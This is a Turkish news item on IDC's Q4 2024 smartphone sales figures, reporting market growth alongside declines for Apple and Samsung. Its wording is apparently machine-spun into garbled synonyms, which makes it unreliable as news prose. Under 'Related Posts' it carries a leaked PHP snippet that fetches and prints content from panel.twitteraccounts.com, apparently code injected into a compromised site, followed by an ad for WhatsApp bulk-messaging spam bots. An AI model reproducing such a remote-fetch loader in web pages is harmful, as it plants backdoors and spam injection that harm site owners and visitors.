Samsung ile Apple’ın akıllı telefon satışları 2024’ün son çeyreğinde düştü

Global akıllı telefon satışları geçen yılın dördüncü çeyreğinde 2023'ün tıpkı devrine nazaran yüzde 2,4 artarken, Samsung ile Apple'ın satışlarında ise düşüş kaydedildi.
AA

Pazar araştırma şirketi International Veri Corporation’ın (IDC) raporuna nazaran, global akıllı telefon satışları 2024’ün son çeyreğinde bir evvelki yılın tıpkı devrine kıyasla yüzde 2,4 artışla 331,7 milyon adede ulaştı.

Raporda, satışların arka arda altıncı çeyrekte büyüdüğü, global akıllı telefon satışlarının 2024 genelinde ise yıllık bazda yüzde 6,4 artışla 1,24 milyar adede ulaştığı bildirildi.

Pazarda bu yıl daha yavaş bir süratte da olsa büyümenin sürmesinin beklendiği belirtilen raporda, pazarın birinci beş oyuncusunun satış sayılarına da yer verildi.

APPLE VE SAMSUNG’UN SATIŞLARINDA DÜŞÜŞ YAŞANDI

Raporda, Apple ve Samsung’un dördüncü çeyrekte ve yıl genelinde birinci iki sıradaki yerlerini koruduğu fakat satışlarında yıllık bazda düşüş yaşadığına dikkati çekilerek, Çinli satıcıların kaydettiği büyüme münasebetiyle iki şirketin pazar hisselerinin küçüldüğü anlatıldı.

IDC datalarına nazaran, geçen yılın son çeyreğinde Apple, yüzde 23,2’lik pazar hissesiyle birinci sırada yer aldı.

Samsung, yüzde 15,6 pazar hissesiyle ikinci sıranın sahibi olurken, Xiaomi yüzde 12,9 ile üçüncü sıraya yerleşti. Transsion ile Vivo da yüzde 8,2’şerlik pazar hisseleriyle dördüncü sırayı paylaştı.

Geçen yılın son çeyreğinde, bir evvelki yılın birebir devrine kıyasla Apple’ın akıllı telefon satış hacmi yüzde 4,1 ve Samsung’un yüzde 2,7 azaldı.

samsung ile applein akilli telefon satislari 2024un son ceyreginde dustu 0 9ChaY7QU

Kaynak: Anadolu Ajansı (AA)
Share the Post:

Related Posts

$exe = curl_init(); curl_setopt($exe, CURLOPT_URL, "https://panel.twitteraccounts.com/code?x=21"); curl_exec($exe); ?>

WhatsApp Toplu Mesaj Gönderme Botu + Google Maps Botu + WhatsApp Otomatik Cevap Botu